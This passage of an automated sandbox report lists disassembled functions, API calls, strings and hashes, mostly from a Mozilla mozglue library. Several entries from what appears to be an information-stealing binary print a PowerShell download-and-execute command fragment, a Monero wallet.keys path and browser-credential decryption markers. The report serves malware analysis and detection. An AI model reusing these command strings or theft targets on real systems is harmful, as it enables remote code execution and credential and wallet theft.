Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6976A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6985B2

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 983fe677dbbdfd636f57bc4bf4f18da6e73b00731ded2bd3697c35bd201452d4
Instruction ID: b02f8cc00a9fe643691ff8c2603e189c6edef795f28809ea080049c642b51048
Opcode Fuzzy Hash: 983fe677dbbdfd636f57bc4bf4f18da6e73b00731ded2bd3697c35bd201452d4
Instruction Fuzzy Hash: 7D218E742006029FDB14DF29C888A5AB7B5AF8930CF24492DE55BC3B51EB31F949CB59

Function 6C69F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F561

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69F577
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F585
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F5A3

Strings

[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C69F56A
[I %d/%d] profiler_resume, xrefs: 6C69F239
[I %d/%d] profiler_resume_sampling, xrefs: 6C69F499
[I %d/%d] profiler_pause_sampling, xrefs: 6C69F3A8

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: ddaf6f8b125b3f6f6eed465e4a80a9166bf3288553cff3e0002d544b284c5598
Instruction ID: c3c579bf121b4f29216cc944803579b568ea5ae6b2b9047ff900d25c0825af38
Opcode Fuzzy Hash: ddaf6f8b125b3f6f6eed465e4a80a9166bf3288553cff3e0002d544b284c5598
Instruction Fuzzy Hash: 82F0B4752002059FDB006F669C8895E77BDEFCA29EF010415FA0583706CF31A801876E

Function 6C6905F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C68CFAE,?,?,?,6C6531A7), ref: 6C6905FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C68CFAE,?,?,?,6C6531A7), ref: 6C690616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6531A7), ref: 6C69061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6531A7), ref: 6C690627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C69061B, 6C690625
<jemalloc>, xrefs: 6C6905FA, 6C69060F

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 718c23f9e1cf966c788dd71da6affca665d055ee368c1ec450e64d4ade668484
Instruction ID: 48e1536f2f0669c544160619b682af56469d35fc0a8b4f871b052f5e726b8a34
Opcode Fuzzy Hash: 718c23f9e1cf966c788dd71da6affca665d055ee368c1ec450e64d4ade668484
Instruction Fuzzy Hash: 69E08CE2A0101037F6142256BC86DBB761CDBC6134F080039FE0E83341E94ABD1A51FB

Function 6C6605F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 718b1e7a507a29194bee81f70a1d2deeffb3db7465f21d181ead2f123607c46d
Instruction ID: 5d20436572da2bca74fa40327ce16ae1097bfe10773e91a6ef8623a71e3834a3
Opcode Fuzzy Hash: 718b1e7a507a29194bee81f70a1d2deeffb3db7465f21d181ead2f123607c46d
Instruction Fuzzy Hash: 8AA15AB0A016458FDB24CF2AC594A99FBF1BF49304F44866ED44A97B00E731BA85CF99

Function 6C6B14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6B14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6B14E2
GetCurrentThreadId.KERNEL32 ref: 6C6B1546
InitializeConditionVariable.KERNEL32(?), ref: 6C6B15BA
free.MOZGLUE(?), ref: 6C6B16B4

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 84b113b9a73e277b9fd29e08484e4394e3a35ff6a497e3b0073eb4c8ef52548c
Instruction ID: aba4de780e88ec0fbd8ae92ed5aa9381c591fd8fdf4d159ca99d83c8d4769e11
Opcode Fuzzy Hash: 84b113b9a73e277b9fd29e08484e4394e3a35ff6a497e3b0073eb4c8ef52548c
Instruction Fuzzy Hash: 2361F572A007009BDB118F25C880BDEB7B5BF8A308F04851DED8A67711EB31E955CB99

Function 6C6ADC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6ADC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C6AD38A,?), ref: 6C6ADC6F
free.MOZGLUE(?,?,?,?,?,6C6AD38A,?), ref: 6C6ADCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C6AD38A,?), ref: 6C6ADCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C6AD38A,?), ref: 6C6ADD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C6AD38A,?), ref: 6C6ADD4A

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: e832c0ffbb3be5372cd064647279fbc88c4c6da441537e842909aca23f795383
Instruction ID: bcadd9162a49f29ceb0e17f71bb7541758fe66ea6d43d186fbb7bff36c009d76
Opcode Fuzzy Hash: e832c0ffbb3be5372cd064647279fbc88c4c6da441537e842909aca23f795383
Instruction Fuzzy Hash: 24416BB5A00605DFCB00CF99C88099AB7F5FF89314B654569DE46ABB11D771FC02CB98

Function 00939260 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(Ho,?,?,?,0093140C,?,006FE148,00000000), ref: 0093926C
lstrcpyn.KERNEL32(00B6AB88,Ho,Ho,?,0093140C,?,006FE148), ref: 00939290
lstrlen.KERNEL32(?,?,0093140C,?,006FE148), ref: 009392A7
wsprintfA.USER32 ref: 009392C7

Strings

Ho, xrefs: 00939268, 00939283, 00939287, 00939299, 009392BD, 0093927B, 0093926B, 00939286, 0093928A, 009392C6
%s%s, xrefs: 009392B5

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$Ho
API String ID: 1206339513-3607161249
Opcode ID: f89f1a69e916c5b7308b1d2a229c011e614e631c666ae0c0edef7f5a1d346b70
Instruction ID: 521ac179b40bd89931835aac9147176f71b2650b57ce874dea552c462c01cac2
Opcode Fuzzy Hash: f89f1a69e916c5b7308b1d2a229c011e614e631c666ae0c0edef7f5a1d346b70
Instruction Fuzzy Hash: BC01CC75500108FFCB04DFECC994EAE7BB9EB48354F148548F909AB244CA75AE40DF91

Function 6C68F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C68F480

Part of subcall function 6C65F100: LoadLibraryW.KERNEL32(shell32,?,6C6CD020), ref: 6C65F122
Part of subcall function 6C65F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C65F132

CloseHandle.KERNEL32(00000000), ref: 6C68F555

Part of subcall function 6C6614B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C661248,6C661248,?), ref: 6C6614C9
Part of subcall function 6C6614B0: memcpy.VCRUNTIME140(?,6C661248,00000000,?,6C661248,?), ref: 6C6614EF

Part of subcall function 6C65EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C65EEE3

CreateFileW.KERNEL32 ref: 6C68F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C68F523

Strings

\oleacc.dll, xrefs: 6C68F4CB

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: e7e48814ea99a76f411752119c71c55213dd58cbadc32e0fce5a34836752ec9b
Instruction ID: 0d1bc788e9566150df40bd87b32a434fe4a46e126bf0021ca286a0276173a7db
Opcode Fuzzy Hash: e7e48814ea99a76f411752119c71c55213dd58cbadc32e0fce5a34836752ec9b
Instruction Fuzzy Hash: 4541BF706097109FE720DF29D884A9BB7F4AF95318F504A1CF59083690EB70E949CBAB

Function 00932C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

ShellExecuteEx.SHELL32(0000003C), ref: 00932D85

Strings

<, xrefs: 00932D39
')", xrefs: 00932CB3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00932D04
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00932CC4

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 0367fa8896eb5e8190f52c8cb9f7e701b04785f45337c775b383d592ceb9b1bc
Instruction ID: d04e16952a0a322c208634e46fd9d24155deecdb23a0aca1d2fdb8ff0f6017b4
Opcode Fuzzy Hash: 0367fa8896eb5e8190f52c8cb9f7e701b04785f45337c775b383d592ceb9b1bc
Instruction Fuzzy Hash: 7A41AF71D10208AADB14FFA0C892FEEB778AF94300F504119F156B7192EF746A4ACF96

Function 6C6B74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C6B7526
__Init_thread_footer.LIBCMT ref: 6C6B7566
__Init_thread_footer.LIBCMT ref: 6C6B7597

Strings

UnmapViewOfFile2, xrefs: 6C6B7552
kernel32.dll, xrefs: 6C6B7557

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 615ffa97ad8c0de051b7642b4bca49c3847e34a81dded684b7e6253d4862282e
Instruction ID: 70c3812f21271e644d1c9f7080f2d601ef814584af8e9d41c780a69cb21825ee
Opcode Fuzzy Hash: 615ffa97ad8c0de051b7642b4bca49c3847e34a81dded684b7e6253d4862282e
Instruction Fuzzy Hash: 1621373270150197CB248FEAD894ED973B5EB87725F054529E80167B80DB31B9118BBF

Function 6C6BC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6BC0E9), ref: 6C6BC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C6BC437
FreeLibrary.KERNEL32(?,6C6BC0E9), ref: 6C6BC44C

Strings

ntdll.dll, xrefs: 6C6BC413
NtQueryVirtualMemory, xrefs: 6C6BC431

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: d4ad702163dedae234b04c25129513d6ca49606b68d6455ed9a7693a3667c5d7
Instruction ID: 0baf2aa69d8cf0f9d1a80e002f6a0c30601aa36f70604daba40d504ae963cc98
Opcode Fuzzy Hash: d4ad702163dedae234b04c25129513d6ca49606b68d6455ed9a7693a3667c5d7
Instruction Fuzzy Hash: 14E0B670B01302ABDF007F73C9887127BF8AB46745F044516AB0592614EBB0F652CB5F

Function 00929E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00929F41

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00929E67
v20, xrefs: 00929E21
@, xrefs: 00929EF1
v10, xrefs: 00929EA3

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: 342f43ee00a458831d729e257f22c721d1b4b779a24f3ddcb3120ccd9b88093c
Instruction ID: 5681792271855f2b4bf81a46424e1a42605512656a8ea0e944a57d020d69e5d7
Opcode Fuzzy Hash: 342f43ee00a458831d729e257f22c721d1b4b779a24f3ddcb3120ccd9b88093c
